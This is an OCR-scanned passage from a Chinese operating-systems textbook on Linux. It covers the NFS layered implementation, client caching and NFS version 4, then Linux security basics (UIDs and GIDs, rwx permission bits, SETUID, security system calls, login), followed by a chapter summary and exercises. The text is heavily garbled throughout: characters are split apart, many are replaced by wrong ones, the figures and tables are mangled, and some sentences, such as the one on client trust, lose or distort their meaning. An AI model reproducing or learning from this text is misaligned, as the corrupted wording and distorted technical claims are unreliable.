不 笠 的 是 ，NEFS 方 法 使 得 难以 实现 精确 的 Linux 文 件 语 义 。 例 如 ， 
在 Linux 中 一 个 文件 可 以 被 打开 并 锁定 以 防止 其 他 进程 对 其 访问 。 当 文 
件 关闭 时 ， 锁 被 释放 。 在 一 个 像 NFS 这 样 的 无 状态 服务 器 中 ， 锁 不 能 与 


己 打开 的 文件 相关 联 ， 这 是 因为 服务 器 不 知道 哪些 文件 是 打开 的 。 因 
此 ，NFS 需 要 一 个 独立 的 ， 附 加 的 机 制 来 处 理 加 锁 。 


NFS 使 用 标准 UNIX 保 护 机 制 ， 为 文件 属 主 、 组 和 其 他 用 户 使 用 
读 、 写 、 执 行 位 (rwx bits) 《在 第 1 章 中 提 到 过 ， 将 在 下 面 详细 讨 
i) 。 最 初 ， 每 个 请 求 消 妃 仅仅 包含 调用 者 的 用 尸 ID 和 组 ID，NFS 服 务 
融 用 它们 来 验证 访问 。 实 际 上 ， 它 信任 客户 端 ， 认 为 客户 端 不 会 进行 其 
骗 。 干 年 来 的 经 验 充 分 表明 了 这 样 一 个 假设 。 现 在 ， 可 以 使 用 公 钥 密 
码 系统 建立 一 个 安全 密 钥 ， 在 每 次 请 求 和 应 答 中 使 用 它 验 证 客户 端 和 服 
务 器 。 司 用 这 个 选项 后 ， 亚 意 的 客户 器 惑 不 能 伪 帮 成 另 一 个 客户 端 了 ， 
因为 它 不 知道 其 他 客户 端的 安全 密 钥 。 





3.NFS 实 现 


尽管 客户 端 和 服务 器 代码 实现 独立 于 NFS 协 议 ， 但 大 多 数 Linux 系 
统 使 用 一 个 类 似 图 10-36 所 示 的 三 层 实 现 。 顶 层 是 系统 调用 层 ， 这 一 层 
处 理 如 open、read 和 close 之 类 的 调用 。 在 解析 调用 和 参数 检查 结束 后 ， 
调用 第 二 层 一 一 虚拟 文件 系统 (VFS) 层 。 


客户 端 内 核 服务 器 内 核 


系统 调用 层 


虚拟 文件 系统 层 D 虚拟 文件 系统 层 


NFS | eee 
服务 器 


来 自 客户 端 
RE 的 消息 
j} fit J 消息 vere 
本 地 磁盘 本 地 磁盘 





图 10-36 NES 层 次 结构 











VEFS 层 的 任务 是 维护 一 个 表 ， 每 个 打开 的 文件 在 该 表 中 有 一 个 表 
项 。VFS 层 为 每 个 打开 文件 保存 一 个 虚拟 i 节点 (或 称 为 v-node)〉 。V 节 
点 用 来 说 明文 件 是 本 地 文件 还 是 远程 文件 。 对 于 远程 文件 ，v 节 点 提供 
足够 的 信息 使 客户 端 能 够 访问 它们 。 对 于 本 地 文件 ， 则 记录 其 所 在 的 文 
件 系统 和 文件 的 i 节 点 ， 这 是 因为 现代 Linux 系 统 能 支持 多 文件 系统 〈 例 
如 ext2fs、/proc、FAT 等 ) 。 尽 管 VFS 是 为 了 支持 NFS 而 发 明 的 ， 但 多 数 
现代 Linux 系 统 将 VFS 作 为 操作 系统 的 一 个 组 成 部 分 ， 不 管 有 没有 使 用 
NFS. 








为 了 理解 如 何 使 用 v 和 节点， 我 们 来 跟踪 一 组 顺序 执行 的 nount，open 
和 read 调 用 。 要 挂 载 一 个 远程 文件 系统 ， 系 统管 理 员 〈 或 /etcrc) 调用 
mount 程 序 ， 并 指明 远程 目录 、 远 程 目录 将 被 挂 载 到 哪个 本 地 目录 ， 以 
及 其 他 信息 。mount 程 序 解析 要 被 挂 载 的 远程 目录 并 找到 该 目录 所 在 的 
NFS 服 务 器 ， 然 后 与 该 机 器 连接 ， 请 求 远程 目录 的 文件 句柄 。 如 采 该 目 
录 存 在 并 可 被 远程 挂 载 ， 服 务 占 就 返回 一 个 该 目录 的 文件 句柄 。 最 后 ， 
mount 程 序 调 用 mount 系 统 调用 ， 将 该 句柄 传递 给 内 核 。 





然后 内 核 为 该 远程 目录 创建 一 个 v 节 点 ， 并 要 求 客户 端 代码 〈 图 10- 
36 所 示 ) 在 其 内 部 表 中 创建 一 个 r 闻 点 Cremote i-node) 来 保存 该 文件 名 
柄 。v 节 点 指 问 r 节 点 。VFS 中 的 每 一 个 v 节 上 最 终 要 么 包含 一 个 指向 NFS 
客户 端 代 码 中 r 节 点 的 指针 ， 要 么 包含 指向 一 个 本 地 文件 系统 的 i 节 点 的 
指针 在 图 10-36 中 用 虚线 标 出 ) 。 因 此 ， 我 们 可 以 从 v 节 点 中 判断 一 个 
文件 或 目录 是 本 地 的 还 是 远程 的 。 如 果 是 本 地 的 ， 可 以 定位 相应 的 文件 
系统 和 i 节 点 。 如 果 是 远程 的 ， 可 以 找到 远程 主机 和 文件 句柄 。 














当 客 户 端 打 开 一 个 远程 文件 时 ， 在 解析 路 径 名 的 茶 个 时 刻 ， 内 核 会 
碰 到 挂 载 了 远程 文件 系统 的 目录 。 内 核 看 到 该 目录 是 远程 的 ， 并 从 该 目 
录 的 Vv 市 点 中 找到 指 同 r 放 点 的 指针 ， 然 后 要 求 NFS 客 户 端 代码 打开 文 

件 。NFS 客 户 端 代码 在 与 该 目录 关联 的 远程 服务 器 上 得 询 路 径 名 中 剩余 
的 部 分 ， 并 返回 一 个 文件 句柄 。 它 在 目 己 的 表 中 为 该 远程 文件 创建 一 个 
fr 节点 并 报告 给 VFS 层 。VFS 层 在 自己 的 表 中 为 该 文件 建立 一 个 指 问 该 r 














市 点 的 Vv 市 尽 。 从 这 里 我 们 再 一 次 看 到 ， 每 一 个 打开 的 文件 或 目录 有 一 


AN A, 要 么 指 问 一 个 r 节 点 ， HAH IS eke 


返回 给 调用 者 的 是 远程 文件 的 一 个 文件 描述 符 。VFS 层 中 的 表 将 该 
文件 描述 符 映 射 到 vv 让 点。 注意 ， 服 务 器 端 没有 创建 任何 表 项 。 尽 管 服 
务 器 已 经 准备 好 在 收 到 请 求 时 提供 文件 句柄 ， 但 它 并 不 记录 哪些 文件 有 
文件 句柄 ， 哪 些 文件 没有 。 当 一 个 文件 句柄 发 送 过 来 要 求 访问 文件 时 ， 
它 检查 该 句柄 。 如 果 是 有 效 的 句柄 ， 束 使 用 它 。 如 末 安 全 集 略 被 局 用 ， 
验证 包含 对 RPC 头 中 的 认证 密 钥 的 检验 。 





当 文件 描述 符 被 用 于 后 续 的 系统 调用 《例如 read) 时 ，VFS 层 先 定 
位 相应 的 Vv 节 后， 然后 根据 它 确 定 文件 是 本 地 的 还 是 远程 的 ， 同 时 确定 
哪个 节点 或 r 闻 点 是 描述 该 文件 的 。 然 后 向 服务 右 发 送 一 个 消 轧 ， 该 消 
恩 包 含 句 柄 、 偏 移 量 (由 客户 并 维持 ， 而 不 是 服务 器 并 ) 和 字 节 数 。 出 
于 效率 方面 的 考虑 ， 即 使 要 传输 的 数据 很 少 ， 客 尸 端 和 服务 器 之 间 的 数 
气 传 输 也 使 用 大 数据 块 ， 通 常 是 8192 字 市 。 











当 请 求 消息 到 达 服 务 器 ， 它 被 送 到 服务 器 的 VFS 层 ， 在 那里 将 判断 
所 请 求 的 文件 在 哪个 本 地 文件 系统 中 。 然 后 ，VFS 层 调用 本 地 文件 系统 
去 读 取 并 返回 请 求 的 字 节 。 随 后 ， 这 些 数据 被 传送 给 客户 端 。 客 户 端 的 
VFS 层 接收 到 它 所 请 求 的 这 个 8KB 块 之 后 ， 又 自动 发 出 对 下 一 个 块 的 请 
求 ， 这 样 当 我 们 需要 下 一 个 块 时 就 可 以 很 快 地 得 到 。 这 个 特性 称 为 预 读 
(read ahead) ， 它 极 大 地 提高 了 性 能 。 


客户 端 同 服务 器 写 文件 的 过 程 是 类 似 的 。 文 件 也 是 以 8KB 块 为 单位 
传输 。 如 果 一 个 write 系 统 调用 提供 的 数据 少 于 8KB， 则 数据 在 客户 端 本 
地 累积 ， 直 到 达到 8KB 时 才 发 送 给 服务 器 。 当 然 ， 当 文件 关闭 时 ， 所 有 
的 数据 都 立即 发 送 给 服务 器 。 





为 一 个 用 来 改善 性 能 的 技术 是 绥 存 ， 与 在 通常 的 UNIX 系 统 中 的 用 
法 一 样 。 服 务 器 缓存 数据 以 避免 磁盘 访问 ， 但 这 对 客户 端 而 言 是 不 可 见 
的 。 客 户 闻 维护 两 个 缓存 : 一 个 缓存 文件 属性 GIR -NRF 
文件 数据 。 当 需要 i 节 点 或 文件 块 时 ， 就 在 缓存 中 检查 有 无 符合 的 数 
据 。 如 果 有 ， 就 可 以 避免 网 络 流量 了 。 























客户 端 缓存 对 性 能 提升 起 到 很 大 帮助 的 同时 ， 也 市 来 了 一 些 令 人 讨 
厌 的 问题 。 假 设 两 个 客户 端 都 缓存 了 同一 个 文件 块 ， 并 且 其 中 一 个 客户 
端 修改 了 它 。 当 另 一 个 客户 读 该 块 时 ， 它 读 到 的 是 旧 的 数据 值 。 这 时 组 
存 是 不 一 致 的 。 


考虑 到 这 个 问题 可 能 带 来 的 严重 性 后 果 ，NFS 实 现 做 了 一 些 事情 来 
绥 解 这 一 问题 。 第 一 ， 为 每 个 缓存 了 的 块 关联 一 个 定时 器 。 当 定时 器 到 
期 时 ， 缓 存 的 项 目 束 被 丢弃 。 通 常 ， 数 据 块 的 时 间 是 3 秒 ， 目 录 块 的 时 
间 是 30 秒 。 这 稍微 减少 了 一 些 风险 。 另 外 ， 当 打开 一 个 有 缓存 的 文件 
时 ， 会 癌 服 务 需 发 送 一 个 消息 来 找 出 文件 最 后 修改 的 时 间 。 如 果 最 后 修 
改 时 间 上 晚 于 本 地 缓存 时 间 ， 那 么 旧 的 副本 被 丢弃 ， 新 副本 从 服务 器 取 
回 。 最 后 ， 每 30 秒 缓存 定时 器 到 期 一 次 ， 绥 存 中 所 有 的 “ 脏 ” 块 〈 即 修改 








过 的 块 ) 都 发 送 到 服务 器 。 尽 管 并 不 完美 ， 但 这 些 修补 使 得 系统 在 多 数 
实际 环境 中 高 度 可 用 。 


4.NFS 第 4 版 





网 络 文件 系统 第 4 版 是 为 了 简化 其 以 前 版 本 的 一 些 操 作 而 设计 的 。 
相对 于 上 面 描述 的 第 3 版 NFS， 第 4 版 NFS 是 有 状态 的 文件 系统 。 这 样 束 
允许 对 远程 文件 调用 open 操 作 ， 因 为 远程 NFS 服 务 器 将 维护 包括 文件 指 
针 在 内 的 所 有 文件 系统 相关 的 结构 。 读 操作 不 再 需要 包含 绝对 读 取 范 
了 ， 而 可 以 从 文件 指针 上 次 所 在 的 位 置 开 始 增加 。 这 就 使 消 筷 变 短 ， 同 
时 可 以 在 一 次 网 络 传输 中 捆绑 多 个 第 3 版 NFS 的 操作 。 





10.7 Linux 的 安全 性 


Linux 作 为 MINIX 和 UNIX 的 复制 品 ， 几 乎 从 一 开始 就 是 一 个 多 用 户 
系统 。 这 段 历 史 意 味 着 Linux 从 早期 开始 就 建立 了 安全 和 信息 访问 控 
制 。 在 接 下 来 的 几 节 里 ， 我 们 将 关注 Linux 安 全 性 的 一 些 方面 。 


10.7.1 基本 概念 


一 个 Linux 系 统 的 用 户 群 体 由 一 定数 量 的 注册 用 户 组 成 ， 其 中 每 个 
用 户 拥 有 一 个 惟一 的 UID 〈 用 户 ID) 。UID 是 介 于 0 到 65 535 之 间 的 一 个 
整数 。 文 件 〈 进 程 及 其 他 资源 ) 都 标记 了 它 的 所 有 者 的 UID 。 尽 管 可 以 
改变 文件 所 有 权 ， 但 是 默认 情况 下 ， 文 件 的 所 有 者 是 创建 该 文件 的 用 
P 


用 户 可 以 被 分 组 ， 其 中 每 组 同样 由 一 个 16 位 的 整数 标记 ， 叫 做 
GID (AID) 。 给 用 户 分 组 通过 在 系统 数据 库 中 添加 一 条 记录 指明 哪个 
用 户 属于 哪个 组 的 方法 手工 〈 由 系统 管理 员 ) 完成 。 一 个 用 户 可 以 同时 
属于 多 个 组 。 为 简单 起 见 ， 我 们 不 再 深入 讨论 这 个 问题 。 


Linux 中 的 基本 安全 机 制 很 简单 。 每 个 进程 记录 它 的 所 有 者 的 UID 和 
GID。 当 一 个 文件 被 创建 时 ， 它 的 UID 和 GID 被 标记 为 创建 它 的 进程 的 
UID 和 GID。 该 文件 同时 获得 由 该 进程 决定 的 一 些 权 限 。 这 些 权 限 指 定 





所 有 者 、 所 有 者 所 在 组 的 其 他 用 户 及 其 他 用 户 对 文件 具有 什么 样 的 访问 
权限 。 对 于 这 三 类 用 户 而 言 ， 潜 在 的 访问 权限 为 读 、 写 和 执行 ， 分 别 由 
r、w 和 xXx 标记。 当然 ， 执 行文 件 的 权限 仅 当 文件 是 可 执行 二 进 制程 序 时 
才 有 意义 。 试 图 执行 一 个 拥有 执行 权限 的 非 可 执行 文件 〈 即 ， 并 非 由 一 
个 合法 的 文件 头 开始 的 文件 ) 会 导致 错误 。 因 为 有 三 类 用 户 ， 每 类 用 户 
的 权限 由 3 个 比特 位 标记 ， 那 么 9 个 比特 位 就 足够 标记 访问 权限 。 图 10- 
37 给 出 了 一 些 9 位 数字 及 其 含义 的 例子 : 


























| = dE i 


io w 允许 的 文件 访问 权限 
| 111000000 


rwx------ | 所 有 者 可 以 读 、 写 和 执行 

rwxrwx 一 一 一 所 有 者 和 组 可 以 读 、 写 和 执行 
a 所 有 者 可 以 读 和 写 ， 组 可 以 读 
rw-r--r- | 所 有 者 可 以 读 和 写 ， 其 他 人 可 以 读 


111101101 | rwxr-xr-x 所 有 者 拥有 所 有 权限 ， 其 他 人 可 以 读 和 执行 
000000000 | --------- 所 有 人 都 不 拥有 任何 权限 


只 有 组 以 外 的 其 他 用 户 拥 有 所 有 权限 (奇怪 但 是 合法 ) 









































































图 10-37 文件 保护 模式 的 例子 





图 10-37 前 两 行 的 意思 很 清楚 ， 人 允许 所 有 者 以 及 与 所 有 者 同 组 的 人 
所 有 权限 。 接 下 来 的 一 行 多 许 所 有 者 同 组 用 户 读 权限 但 是 不 可 以 改变 其 
内 容 ， 而 其 他 用 户 没 有 任何 权限 。 第 四 行 通常 用 于 所 有 者 想 要 公开 的 数 
据 文 件 。 类 似 地 ， 第 五 行 通常 用 于 所 有 者 想 要 公开 的 程序 。 第 六 行 剥 夺 
了 所 有 用 户 的 任何 权利 。 这 种 模式 有 时 用 于 伪 文 件 来 实现 相互 排斥 ， 因 
为 想 要 创建 一 个 同名 的 文件 的 任何 行为 都 将 失败 。 如 采 多 个 进程 同时 想 














要 创建 这 样 一 个 文件 作为 锁 ， 那 么 只 有 一 个 能 够 创建 成 功 。 最 后 一 个 例 
子 相 当 奇 怪 ， 因 为 它 给 组 以 外 其 他 用 户 更 多 的 权限 。 但 是 ， 它 的 存在 是 
符合 保护 规则 的 。 羊 运 的 是 ， 尽 管 没有 任何 文件 访问 权限 ， 但 是 所 有 者 
可 以 随后 改变 保护 模式 。 








UID 为 0 的 用 户 是 一 个 特殊 用 户 ， 称 为 超级 用 户 (或 者 根 用 户 )。 
超级 用 户 能 够 读 和 写 系统 中 的 任何 文件 ， 不 论 这 个 文件 为 谁 所 有 ， 也 不 
这 个 文件 的 保护 模式 如 何 。UID 为 0 的 进程 拥有 调用 一 小 部 分 受 保护 
的 系统 调用 的 权限 ， 而 普通 用 户 古 不 能 调用 这 些 系统 调用 的 。 一 般 而 
言 ， 只 有 系统 管理 员 知道 超级 用 户 的 密码 ， 但 是 很 多 学 生 寻 找 系统 安全 
汤 洞 想 让 目 己 能 够 不 用 密码 就 可 以 以 超级 用 户 的 喘 份 登录 ， 并 且 认 为 这 
一 种 了 不 起 的 行为 。 管 理 人 员 往 往 对 这 种 行为 很 不 满 。 














目录 也 是 一 种 文件 ， 并 且 具 有 普通 文件 一 样 的 保护 模式 。 不 同 的 
是 ， 目 录 的 x 比特 位 表示 会 找 权 限 而 不 是 执行 权限 。 因 此 ， 如 果 一 个 目 
录 上 其 有 保护 模式 rwxr-xr-x， 那 么 它 人 允许 所 有 者 恋 、 写 和 但 找 目录， 但 是 
其 他 人 只 可 以 读 和 奏 找 ， 而 不 允许 从 中 添加 或 者 删除 文件 。 

















与 WO 相 关 的 特殊 文件 拥有 与 普通 文件 一 样 的 保护 位 。 这 种 机 制 可 
以 用 来 限制 对 VO 设备 的 访问 权限 。 例 如 ， 假 设 打 印 机 特殊 文 
件 ，/dewlp， 可 以 被 根 用 户 或 者 一 个 叫 守 护 进 程 的 特殊 用 户 拥有 ， 基 有 
保护 模式 rw-------， 从 而 阻止 其 他 所 有 人 对 打印 机 的 访问 权限 。 毕 葛 
如 果 每 个 人 都 可 以 任意 使 用 打印 机 ， 那 么 就 会 发 生 混乱 。 





当然 ， 让 /dev/lp 被 守护 进程 以 保护 模式 rw------- 拥有 ， 意 味 着 其 他 任 
何人 都 不 可 以 使 用 打印 机 ， 但 是 这 种 做 法 限制 了 很 多 合法 的 打印 要 求 。 
事实 上 ， 人 允许 对 WO 设备 及 其 他 系统 资源 进行 受 控 访问 的 做 法 上 共有 一 个 
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这 个 问题 通过 增加 一 个 保护 位 SETUID 到 之 前 的 9 个 比特 位 来 解决 。 
当 一 个 进程 的 SETUID 位 打开 ， 它 的 有 效 UID 将 变 成 相应 可 执行 文件 的 
所 有 者 的 UID， 而 不 是 当前 使 用 该 进程 的 用 户 的 UID。 当 一 个 进程 试图 
打开 一 个 文件 时 ， 系 统 检 查 的 将 是 它 的 有 效 UID， 而 不 是 真正 的 UID。 
将 访问 打印 机 的 程序 设置 为 被 守护 进程 所 有 ， 同 时 打开 SETUID 位 ， 这 
样 任何 用 户 都 可 以 执行 该 程序 ， 并 拥有 守护 进程 的 权限 “例如 访 
问 /dep/ip) ， 但 是 这 仅 限 于 运行 该 程序 〈 例 如 给 打印 任务 排序 ) 。 











许多 敏感 的 Linux 程 序 被 根 用 户 所 有 ， 但 是 打开 它们 的 SETUID 位 。 
例如 ， 人 允许 用 户 改 变 密码 的 程序 需要 写 password 文 件 。 人 允许 password 文 
件 公 开 可 写 显 然 不 是 个 好 主意 。 解 决 的 方法 是 ， 提 供 一 个 被 根 用 户 所 有 
同时 SETUID 位 打开 的 程序 。 虽 然 该 程序 拥有 对 password 文 件 的 全 部 权 
限 ， 但 是 它 仅 仅 改 变调 用 该 程序 的 用 户 的 密码 ， 而 不 允许 其 他 任何 的 访 
问 权 限 。 











除了 SETUID 位 ， 还 有 一 个 SETGID 位 ， 工 作 原 理 同 SETUID 类 似 。 
它 暂 时 性 地 给 用 户 该 程序 的 有 效 GID。 然 而 在 实践 中 ， 这 个 位 很 少 用 
到 ]。 








10.7.2 ”Linux 中 安全 相关 的 系统 调用 


只 有 为 数 不 多 的 几 个 安全 性 相关 的 系统 调用 。 其 中 最 重要 的 几 个 在 
图 10-38 中 列 出 。 最 第 用 到 的 安全 相关 的 系统 调用 是 chmod。 它 用 来 改变 
保护 模式 。 例 如 : 





s=chmod ("/usr/ast/newgame",0755) ; 





它 把 newgame 文 件 的 保护 模式 修改 为 rwxr-xr-x， 这 样 任何 人 都 可 以 
运行 该 程序 (0755 是 一 个 八进制 常数 ， 这 样 表示 很 方便 ， 因 为 保护 位 每 
三 个 分 为 一 组 ) 。 只 有 该 文件 的 所 有 者 和 超级 用 户 才 有 权利 改变 保护 模 
Te 






























系统 调用 th g 
s = chmod(path, mode) 改变 文件 的 保护 模式 
s = access a mode) 使 用 真实 的 UID 和 GID 测 试 访问 权限 













获取 真实 的 UID 
获取 有 效 UID 
获取 真实 的 GID 
获取 有 效 GID 
改变 所 有 者 和 组 
设置 UID 
设置 GID 





uid = a 
gid = getgid( ) 
gid = getegid( ) 
s = setuid(uid) 
s = setgid(gid) 
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图 10-38 一 些 与 安全 相关 的 系统 调用 。 当 错误 发 生 时 ， 返 回 值 S 


为 -1; uid 和 gid 分 别 是 UID 和 GID。 参 数 的 意思 不 言 自明 





access 系 统 调 用 检验 用 实际 的 UID 和 GID 对 某 文件 是 否 拥有 特定 的 权 
限 。 对 于 根 用 户 所 拥有 的 并 设置 了 SETUID 的 程序 ， 我 们 需要 这 个 系统 
调用 来 避免 安全 违例 。 这 样 的 程序 可 以 做 任何 事情 ， 有 时 需要 这 样 的 程 
序 判断 是 否 人 允许 用 户 执行 某 种 访问 。 让 程序 通过 访问 判断 显然 是 不 行 
的 ， 因 为 这 样 的 访问 总 能 成 功 。 使 用 access 系 统 调 用 ， 程 序 就 能 知道 用 
实际 的 UID 和 GID 是 否 能 够 以 一 定 的 权限 访问 文件 。 











接 下 来 的 四 个 系统 调用 返回 实际 的 和 有 效 的 UID 和 GID。 最 后 的 三 
个 只 能 够 被 超级 用 户 使 用 ， 它 们 改变 文件 的 所 有 者 以 及 进程 的 UID 和 


10.7.3. Linux F H ZAK 


当 用 户 登 录 的 时 候 ， 登 录 程 序 login (为 根 用 户 所 有 且 SETUID 打 
开 ) 要 求 输入 登录 名 和 密码 。 它 首先 计算 密码 的 散 列 值 ， 然 后 
在 /etc/passwd 文 件 中 碍 找 ， 看 是 否 有 相 匹 配 的 项 《网 络 系统 工作 得 稍 有 
不 同 ) 。 使 用 散 列 的 原因 是 防止 密码 在 系统 中 以 非 加 密 的 方式 存在 。 如 
果 密 码 正 确 ， 登 录 程 序 在 /etcpasswd 中 读 取 该 用 户 选择 的 shell 程 序 的 名 
称 ， 例 如 可 能 是 pash， 但 是 也 有 可 能 是 其 他 的 shell， 例 如 csh 或 者 ksh。 
然后 登录 程序 使 用 setuid 和 setgid 来 使 自己 的 UID 和 GID 变 成 用 户 的 UID 和 
GID 注 意 ， 它 一 开始 的 时 候 是 根 用 户 所 有 且 SETUID 打 开 〉。 然 后 它 
打开 键盘 作为 标准 输入 《文件 描述 符 0) ， 屏 幕 为 标准 输出 《文件 描述 
符 1) ， 屏 幕 为 标准 错误 输出 《文件 描述 符 2) 。 最 后 ， 执 行 用 户 选择 的 
shell 程 序 ， 因 此 终止 自己 。 














到 这 里 ， 用 户 选择 的 shel] 已 经 在 运行 ， 并 且 被 设置 了 正确 的 UID 和 
GID， 标 准 输入 、 标 准 输出 和 标准 错误 输出 都 被 设置 成 了 默认 值 。 它 创 
建 任何 子 进程 (也 就 是 用 户 输入 的 命令 ) 都 将 自动 继承 shell 的 UID 和 
GID， 所 以 它们 将 拥有 正确 的 UID 和 GID， 这 些 进程 创建 的 任何 文件 也 


具有 这 些 值 。 


当 任何 进程 想 要 打开 一 个 文件 ， 系 统 首先 将 文件 的 i 节 点 所 记录 的 








保护 位 与 用 户 的 有 效 UID 和 有 效 GID 对 比 ， 来 检查 访问 是 否 被 允许。 如 
果 多 许 访 问 ， 就 打开 文件 并 且 返 回 文 件 描述 符 ; 否则 不 打开 文件 ， 返 
回 -1。 在 接 下 来 的 read 和 write 中 不 再 检查 权限 。 因 此 ， 当 一 个 文件 的 保 
护 模 式 在 它 被 打开 后 修改 ， 新 模式 将 无 法 影响 已 经 打开 该 文件 的 进程 。 





Linux 安 全 模型 及 其 实现 在 本 质 上 跟 其 他 大 多 数 传统 的 UNIX 系 统 相 
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Linux 一 开始 是 一 个 开源 的 完全 复制 UNIX 的 系统 ， 而 今天 它 已 经 广 
泛 应 用 于 各 种 系统 ， 从 笔记 本 到 超级 计算 机 。 它 有 三 种 主要 接口 : 
shell、C 函 数 库 和 系统 调用 。 此 外 ， 通 常 使 用 图 形 用 户 界面 以 简化 用 户 
与 系统 的 交互 。shell 人 允许 用 户 输入 命令 来 执行 。 这 些 命令 可 能 是 简单 的 
命令 、 管 线 或 者 复杂 的 命令 结构 。 输 入 和 输出 可 以 被 重 定向 。C 函 数 库 
包括 了 系统 调用 和 许多 增强 的 调用 ， 例 如 用 于 格式 化 输出 的 printf。 实 
际 的 系统 调用 接口 是 依赖 于 体系 结构 的 ， 在 x86 平 台 上 大 约 有 250 个 系统 
调用 ， 每 个 系统 调用 做 需要 做 的 事情 ， 不 会 做 多 余 的 事情 。 





Linux 中 的 关键 概念 包括 进程 、 内 存 模 型 、VO 和 文件 系统 。 进 程 可 
以 创建 子 进程 ， 形 成 一 棵 进程 树 。Linux 中 的 进程 管理 与 其 他 的 UNIX 系 
统 不 太一 样 ，Linux 系 统 把 每 一 个 执行 体 一 一 单线 程 进程 ， 或 者 多 线程 
进程 中 的 每 一 个 线程 或 者 内 核 一 一 看 做 不 同 的 任务 。 一 个 进程 ， 或 者 统 
称 为 一 个 任务 ， 通 过 两 个 关键 的 部 分 来 表示 ， 即 任务 结构 和 描述 用 户 地 
址 空间 的 附加 信息 。 前 者 常 驻 内 存 ， 后 者 可 能 被 换 出 内 存 。 进 程 创建 是 
通过 复制 父 进程 的 任务 结构 ， 然 后 将 内 存 映 像 信 息 设置 为 指 癌 父 进 程 的 
内 存 映像 。 内 存 映 像 页 面 的 真正 复制 仅 当 在 共享 不 允许 和 需要 修改 内 存 
单元 时 发 生 。 这 种 机 制 称 为 写 时 复制 。 进 程 调度 采用 基于 优先 级 的 算 
法 ， 给 予 交互 式 进程 更 高 的 优先 级 。 











每 个 进程 的 内 存 模 型 由 三 个 部 分 组 成 : 代码 、 数 据 和 堆栈 。 内 存 管 
理 采 用 分 页 式 。 一 个 常 驻 内 存 的 表 跟 踩 每 一 页 的 状态 ， 页 面 守护 进程 采 
用 一 种 修改 过 的 双 指 针 时 钟 算法 保证 系统 有 足够 多 的 空闲 页 。 





可 以 通过 特殊 文件 访问 IO 设备 ， 每 个 设备 都 有 一 个 主 设备 号 和 次 
设备 号 。 块 设备 MO 使 用 内 存 缓存 磁盘 块 ， 以 减少 访问 磁盘 的 次 数 。 字 
符 IO 可 以 工作 在 原始 模式 ， 或 者 字符 流 可 以 通过 行规 则 加 以 修改 。 网 
络 设备 稍 有 不 同 ， 它 关联 了 整个 网 络 协 议 模 块 来 处 理 网 络 数据 包 流 。 











文件 系统 由 文件 和 目录 所 组 成 的 层次 结构 组 成 。 所 有 磁盘 都 挂 载 到 
一 个 有 惟一 根 的 目录 树 中 。 文 件 可 以 从 文件 系统 的 其 他 地 方 连接 到 一 个 
HP. BH, BCETARH, 这 会 户 生 一 个 六 件 手 述 得 用 于 
接 下 来 的 读 和 写 。 文 件 系统 内 部 主要 使 用 三 种 表 : 文件 描述 符 表 、 打 开 
文件 描述 表 和 i 节 点 表 。 其 中 证 点 表 是 最 重要 的 表 ， 包 含 了 文件 管理 所 
需要 的 所 有 信息 和 文件 位 置信 息 。 目 录 和 设备 ， 以 及 其 他 特殊 文件 也 都 
表示 为 文件 。 

















保护 基于 对 所 有 者 、 同 组 用 户 和 其 他 人 的 读 、 写 和 执行 的 访问 控 
制 。 对 目录 而 言 ， 执 行 位 指示 是 否 允 许 搜索 。 


习题 


1. 一 个 目录 包含 以 下 的 文件 : 


aardvark feret koala porpoise unicorn 
bonefish grunion llama quacker vicuna 
capybara hyena marmot rabbit weasel 
dingo ibex nuthatch seahorse yak 
emu jellyfish ostrich tuna zebu 


哪些 文件 能 通过 命令 ls[abc]*e* 被 罗列 出 来 ? 


2. 下 面 的 Linux shell 管 线 的 功能 是 什么 ? 





grep nd xyz|wc-| 





3. 写 


一 个 能 够 在 标准 输出 上 打印 文件 z 的 第 八 行 的 Linux 管 线 。 


4.Linux 在 标准 输出 和 标准 错误 对 于 终端 都 是 默认 的 情况 下 是 怎么 区 
分 标准 输出 和 标准 错误 的 ? 


5. 一 个 用 户 在 终端 键入 了 如 下 的 命令 : 





alb|c& 


dlelf 





& 





在 shell 处 理 完 这 些 命令 后 ， 有 多 少 新 的 进程 在 运行 ? 


6. 当 Linux shell 局 动 一 个 进程 ， 它 把 它 的 环境 变量 ， 如 HOME 放 到 
进程 栈 中 ， 使 得 进程 可 以 找到 它 的 home 目 录 是 哪个 。 如 果 这 个 进程 之 
后 进行 派生 ， 那 么 它 的 子 进程 也 能 上 自动 地 得 到 这 些 变量 吗 ? 


7. 在 如 下 的 条 件 下 : 文本 大 小 =100KB， 数 据 大 小 =20KB， 栈 大 小 
=10KB， 任 务 结构 =1I1KB， 用 户 结构 =5KB， 一 个 传统 的 UINX 系 统 要 人 花 
多 长 时 间 派 生 一 个 子 进程 ? 内 核 陷 阱 和 返回 的 时 间 用 lms， 机 器 每 50ns 
就 可 以 复制 一 个 32 位 的 字 。 共 享 文本 段 ， 但 是 不 共享 数据 段 和 堆栈 段 。 








8. 当 多 兆 字 节 程序 变 得 越 来 越 普 志 ， 伦 在 执行 fork 系 统 调用 以 及 复 
制 调用 进程 的 数据 段 和 堆栈 段 的 时 间 也 成 比例 地 增长 。 当 在 Linux 中 执 
行 fork， 父 进程 的 地 址 空间 是 没有 被 复制 的 ， 不 像 传统 的 fork 语 义 那 
样 。Linux 是 怎样 防止 子 进程 做 一 些 会 彻底 改变 fork 语 义 的 行动 的 ? 





9. 当 一 个 进程 进入 伪 死 状态 后 ， 取 走 它 的 内 存 有 意义 吗 ? 为 什么 ? 


10. 你 认为 为 什么 Linux 的 设计 者 禁止 一 个 进程 向 不 属于 它 的 进程 组 
的 男 一 个 进程 友信 号 呢 ? 


11. 一 个 系统 调用 常用 一 个 软件 中 断 陷阱 指令 实现 。 一 个 普通 
的 过 程 调用 在 Pentium 的 硬件 上 也 能 使 用 吗 ? 如 果 能 使 用 ， 在 哪 种 条 件 
下 ? 如 何 使 用 ? 如 果 不 能 ， 请 说 明 原 因 。 





12. 通 常情 况 下 ， 你 认为 守护 进程 比 交 互 进程 具有 更 高 的 优先 级 还 
是 更 低 的 优先 级 ? 为什么? 





13. 当 一 个 新 进程 被 创建 ， 它 一 定 会 被 分 配 一 个 惟一 的 整 型 数 作为 
它 的 PID。 在 内 核 里 有 一 个 每 个 进程 创建 时 就 圳 增 的 计数 絮 够 用 么 ? 其 
中 计数 器 作为 新 的 PID。 讨 论 你 的 结论 。 


14. 在 每 个 任务 结构 中 的 进程 项 中 ， 父 进程 的 PID 被 储存 。 为 什么 ? 


15. 当 响应 一 个 传统 的 UNIX fork 调 用 时 ，Linux 的 clone 命 令 会 使 用 
什么 样 的 sharing_flags 位 的 组 合 ? 


